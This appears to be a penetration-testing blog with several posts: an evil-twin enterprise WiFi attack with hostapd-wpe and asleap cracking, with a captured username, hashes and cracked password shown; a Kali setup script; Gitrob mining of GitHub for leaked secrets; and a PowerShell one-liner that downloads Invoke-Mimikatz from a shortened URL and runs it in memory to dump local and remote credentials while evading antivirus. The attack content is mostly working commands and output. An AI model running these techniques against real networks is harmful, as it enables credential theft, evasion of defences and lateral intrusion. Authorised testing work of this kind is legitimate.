Cracking WiFi – Enterprise

WifiUsing hostapd-wpe which implements an IEEE 802.1x Authenticator and Authentication Server for impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

Installation is relatively simple, but might encounter some hiccups in Ubuntu/Debian/Kali. To aid in getting you up and running, I’ve created the following guide.

Installation

Load Dependancies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Stage and perform configuration steps:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
interface=eth0 to interface=wlan0 (or the interface of choosing)
change driver=wired to #driver=wired
uncomment all 802.11 options and define the SSID you wish to “man-in-the-middle”

Run the following to eliminate errors on start:
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648

Use asleap to crack this passwords, using word lists:
format = asleap -C (challenge) -R (response) -W (wordlist)

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 – actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with “/opt/SecLists/Passwords/rockyou.txt”.
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234

Penetration Testing Platform Quick-load – Kali

pentestWhen pentesting in groups or managing a small team of assessors, one of the primary challenges is quickly getting everyone on the same page.  This isn’t possible on all levels.  However, it is our hope that this quick github script can at least get your toolkit close to a standard or in the event of a hardware failure, get you back up and running quickly.

As always, free to fork the github repo and improve upon it.

Installation:

  1. Perform a base-build of Kali Linux.
    Downloadable from here: Kali
  2. Navigate to /opt/
  3. Issue the following command: git clone https://github.com/logikphreak/kali-setup.git
  4. Issue this last command: sh core.sh

You will be prompted for a few platform specific details, but the generally answer will be “Debian”.

Using Gitrob in your Penetration Testing.

Github is a remarkable place to collect data on a target, be it for a legitimate security engagement or to test your own security. It is a Ruby-based platform that can quickly build a local, searchable framework of all code released to Github by a particular organization. Once installation is complete, usability is trivial.

Screen Shot 2015-03-06 at 9.39.24 AM

gitrob -o <org>  (eg: gitrob -o aol)

Installation (assumes you are building on Kali):

  1. Navigate to /opt/ and issue the following:
    git clone https://github.com/logikphreak/gitrob.git
  2. Issue the following: sudo -u postgres -i
  3. Create your progress account and database with the following:
    createuser -s gitrob –pwprompt
    createdb -O gitrob gitrob
  4. For Gitrob to work properly, you will need to create an API key in your Github account.  This is quite simple. After assuring you are logged into github, navigate to https://github.com/settings/applications and generate a new key.
    Copy the value as you will need it later.
    Screen Shot 2015-03-06 at 9.52.02 AM
  5. Issue the command “gem install gitrob” in the /opt/gitrob–0.0.5/
  6. Issue gitrob –configure (pasting your api key and password created during the postgres process).
  7. Finally, issue (gitrob -o orgname) and let it work. A web service will be spawned when it is complete that can be utilized for searching for leaked sensitive information.

Pro Tip:  You can easily print the browser tabs into PDF’s and echo the gitrob routine into a text file.  This is particularly useful for evidence in your reports.

Hat tip to Michael for the incredibly tool.

Post-Exploitation – Collecting credentials and staying off the disk.

collaboratearmitageIn the many penetration tests that I’ve conducted, one of the primary goals is to collect data for the use of lateral movement through the network, in a way that does trigger any alarms or alert in Antivirus/Endpoint solutions.  This technique will run in memory without actually installing anything to the disk.  This will aid in bypassing additional controls, such as Tripwire.

This is where I’ve found PowerSploit and more particularly, “Invoke-MimiKatz” to be very useful.  As Powershell is generally permitted in all environments, regardless of Application Whitelisting, using this module is incredibly powerful.

Giving credit where it is due, clymb3r originally created and posted the script that will be used in this short demo.

It is important to note that this is a post-exploitation module.  You will need to have compromised a host that also permitted the elevation of privileges.  However, domain escalation is not necessary.

From within PowerShell inside the compromised host, issue the following command:

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://tinyurl.com/l79l56h’); Invoke-Mimikatz -DumpCreds”

You should see similar output in the console.  You can collect and use all of the credentials displayed for connecting to additional hosts in the environment.

Screen Shot 2015-03-04 at 8.00.44 AM

Windows 7

 

If you escalated to domain-level credentials, you can also issue the following command to collect credentials remotely from other hosts.  This is particularly useful for maintaining presence or viewing additional data on the network.

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://tinyurl.com/l79l56h’); Invoke-Mimikatz -DumpCreds -ComputerName @(‘computer1’, ‘computer2’)”

This technique will not work in Windows 8/10, as new security provisions have been made.  However, I’ve seen very small deployment counts for those platforms, whereas XP and Windows 7 are still very much alive and well.

Screen Shot 2015-03-04 at 7.37.32 AM

Windows 10